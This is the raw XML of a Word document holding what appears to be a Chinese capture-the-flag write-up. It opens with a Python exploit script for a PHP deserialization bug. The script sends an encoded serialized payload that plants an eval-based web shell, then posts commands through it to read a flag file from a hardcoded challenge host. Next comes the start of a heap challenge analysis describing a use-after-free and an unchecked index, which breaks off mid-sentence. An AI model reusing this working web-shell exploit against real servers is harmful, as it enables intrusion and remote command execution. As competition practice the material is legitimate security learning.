      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A754B56" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            response = requests.get(target_url, timeout=10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D82C57" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0029B018" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            if response.status_code == 200:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A553BD2" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                print("[+] </w:t>
      </w:r>
      <w:r>
        <w:t>请求成功</w:t>
      </w:r>
      <w:r>
        <w:t>!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E4C7FC" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                print(f"[+] </w:t>
      </w:r>
      <w:r>
        <w:t>响应内容</w:t>
      </w:r>
      <w:r>
        <w:t>: {response.text[:500]}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD8D0B5" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CB9881" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                print(f"[-] </w:t>
      </w:r>
      <w:r>
        <w:t>请求失败，状态码</w:t>
      </w:r>
      <w:r>
        <w:t>: {response.status_code}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA6644D" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C62DD34" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            # </w:t>
      </w:r>
      <w:r>
        <w:t>检查是否写入成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CCD7B3" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            print("\n[+] </w:t>
      </w:r>
      <w:r>
        <w:t>检查</w:t>
      </w:r>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:t>...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187BD6A1" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            shell_check = requests.get(f"{self.url}shell.php", timeout=10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E5A7D7" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            if shell_check.status_code == 200:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4264DCA4" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                print("[+] Shell</w:t>
      </w:r>
      <w:r>
        <w:t>文件可能存在</w:t>
      </w:r>
      <w:r>
        <w:t>!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32714AE2" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5288A2" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                print(f"[-] Shell</w:t>
      </w:r>
      <w:r>
        <w:t>文件检查失败，状态码</w:t>
      </w:r>
      <w:r>
        <w:t>: {shell_check.status_code}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C508218" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179BCB5B" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            # </w:t>
      </w:r>
      <w:r>
        <w:t>执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED52678" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            if cmd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62319D36" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                print(f"\n[+] </w:t>
      </w:r>
      <w:r>
        <w:t>尝试执行命令</w:t>
      </w:r>
      <w:r>
        <w:t>: {cmd}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246915BB" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                post_data = {"cmd": cmd}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E737D19" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                cmd_response = requests.post(f"{self.url}shell.php", data=post_data, timeout=10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9323F0" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                print(f"[+] </w:t>
      </w:r>
      <w:r>
        <w:t>命令执行结果</w:t>
      </w:r>
      <w:r>
        <w:t>:\n{cmd_response.text}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD691C5" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A2F568" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAD4B27" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            print(f"[-] </w:t>
      </w:r>
      <w:r>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:t>: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65291618" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            import traceback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74418B87" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            traceback.print_exc()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1192C111" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460568F1" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    def simple_exploit(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5897AF21" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E266D10" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:t>使用你提供的现成</w:t>
      </w:r>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:t>进行攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3332E41E" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42661C8E" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:t>你提供的</w:t>
      </w:r>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62623C44" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        payload = "a%3A2%3A%7Bi%3A0%3BO%3A7%3A%22install%22%3A2%3A%7Bs%3A17%3A%22%00install%00username%22%3Bs%3A29%3A%22%3C%3Fphp+%40eval%28%24_POST%5B%22cmd%22%5D</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>%29%3B%3F%3E%22%3Bs%3A17%3A%22%00install%00password%22%3Bs%3A3%3A%22pad%22%3B%7Di%3A1%3BO%3A7%3A%22install%22%3A2%3A%7Bs%3A17%3A%22%00install%00username%22%3BO%3A7%3A%22install%22%3A2%3A%7Bs%3A17%3A%22%00install%00username%22%3BO%3A5%3A%22Until%22%3A3%3A%7Bs%3A1%3A%22a%22%3Bs%3A10%3A%22ZipArchive%22%3Bs%3A1%3A%22b%22%3Bs%3A12%3A%22install.lock%22%3Bs%3A1%3A%22c%22%3Bi%3A8%3B%7Ds%3A17%3A%22%00install%00password%22%3Bs%3A3%3A%22pad%22%3B%7Ds%3A17%3A%22%00install%00password%22%3Bs%3A3%3A%22pad%22%3B%7D%7D"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAEDDE2" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6883177E" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0829284D" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            print("[+] </w:t>
      </w:r>
      <w:r>
        <w:t>使用现成</w:t>
      </w:r>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:t>进行攻击</w:t>
      </w:r>
      <w:r>
        <w:t>...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFBB830" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            target_url = f"{self.url}?data={payload}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD5D557" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22664486" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            response = requests.get(target_url, timeout=10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485F7AF5" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            print(f"[+] </w:t>
      </w:r>
      <w:r>
        <w:t>响应状态码</w:t>
      </w:r>
      <w:r>
        <w:t>: {response.status_code}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FCDE47" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            print(f"[+] </w:t>
      </w:r>
      <w:r>
        <w:t>响应内容</w:t>
      </w:r>
      <w:r>
        <w:t>: {response.text[:500]}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE7F208" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593CE523" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            # </w:t>
      </w:r>
      <w:r>
        <w:t>尝试执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102F4D74" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            print("\n[+] </w:t>
      </w:r>
      <w:r>
        <w:t>尝试读取</w:t>
      </w:r>
      <w:r>
        <w:t>flag...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BB1789" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            post_data = {"cmd": "system('cat /f*');"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0182A5AF" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            cmd_response = requests.post(f"{self.url}config.php", data=post_data, timeout=10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1AE5EC" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF353CF" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            if cmd_response.status_code == 200:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E32B68" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                print("[+] </w:t>
      </w:r>
      <w:r>
        <w:t>命令执行结果</w:t>
      </w:r>
      <w:r>
        <w:t>:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410526E6" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                print(cmd_response.text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB21187" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33576F4A" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                print(f"[-] </w:t>
      </w:r>
      <w:r>
        <w:t>命令执行失败，状态码</w:t>
      </w:r>
      <w:r>
        <w:t>: {cmd_response.status_code}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C553E7A" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4AAAEF" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248C59C9" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            print(f"[-] </w:t>
      </w:r>
      <w:r>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:t>: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375D2805" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD"/>
    <w:p w14:paraId="0BD523E8" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t>def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACF37D4" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    if len(sys.argv) &gt; 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9D6A80" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        url = sys.argv[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140B89F8" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B89DED" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        url = "http://c7c0b927.clsadp.com/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8F54BA" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B25649" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    exploit = PayloadGenerator()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA50BE2" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    exploit.url = url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C59D05" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2579F8" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    print("PHP</w:t>
      </w:r>
      <w:r>
        <w:t>反序列化漏洞利用脚本</w:t>
      </w:r>
      <w:r>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C4FEEE" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    print("=" * 50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D74B026" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30968AC8" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:t>使用方法</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>：使用现成</w:t>
      </w:r>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A56E091" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    exploit.simple_exploit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F1E036" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073340AD" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:t>使用方法</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>：生成新</w:t>
      </w:r>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:t>（可选）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5444E425" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    # print("\n" + "="*50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F13B3A" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    # print("</w:t>
      </w:r>
      <w:r>
        <w:t>尝试生成新</w:t>
      </w:r>
      <w:r>
        <w:t>payload...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7A0D77" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    # exploit.exploit("system('cat /f*');")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B636F90" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD"/>
    <w:p w14:paraId="70BBBF47" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA5EA12" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1111A84E" w14:textId="54910921" w:rsidR="00B85AAD" w:rsidRDefault="004F7831" w:rsidP="004F7831">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="004F7831">
        <w:t>我不吃牛肉</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372020E2" w14:textId="77777777" w:rsidR="004F7831" w:rsidRDefault="004F7831">
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序是一个基于堆的菜单系统，主循环通过</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> rand() % 4 </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随机选择功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB04C56" w14:textId="77777777" w:rsidR="004F7831" w:rsidRDefault="004F7831">
      <w:r w:rsidRPr="006809B5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AC7C33D" wp14:editId="6112CE6E">
            <wp:extent cx="4348163" cy="3563442"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1344298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9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383" cy="356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831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随机值</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>子函数</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   | </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应脚本操作</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">     |</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">| 0   | sub_AE5() | </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>申请内存</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> | add(idx, size)       |</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t>| 1   | sub_B4A()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>释放内存</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> | free(idx           |</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">| 2   | sub_B8E() | </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编辑内存</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> | edit(idx, len, content) |</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">| 3   | sub_C02() | </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打印内存</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> | show(idx)          |</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据存储在全局数组</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> qword_2020C0 </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，最大索引未检查。</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UAF</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Use After Free</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t>// sub_B4A() - free</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">free((void *)qword_2020C0[v0]);  // </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>释放指针</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
